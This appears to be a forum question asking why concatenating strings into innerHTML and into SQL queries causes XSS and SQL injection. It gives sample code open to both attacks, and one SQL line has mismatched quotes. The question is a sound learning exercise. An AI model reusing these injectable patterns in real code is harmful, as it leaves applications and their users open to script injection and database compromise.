I was told recently (on here) that concatenating your Javascript will cause XSS vulnerabilities. I have done my research on here and on google to find out why this bad, but I am not seeing it.
Part 1 - Javascript: Apparently something like this is the unsafe way. Why? How should you do it instead?
// part of a script dynamically making table rows
var el = document.createElement('div');
el.innerHTML = '<input type="text" id="myId'+id+'" />';
cellOne.appendChild(el);
Part 2 - MySQL: I was told that you when you concat SQL, it exposes you to SQL injections. I am not sure what they meant by concat SQL exactly. I assume they were not talking about the SQL concat function. I am guessing they meant:
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
Or maybe?
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
$sql .= " AND `col2` = '".$myvar.'";
Does this expose you to SQL injection?
The SQL part is academic. I use PDO to prevent SQL injection.
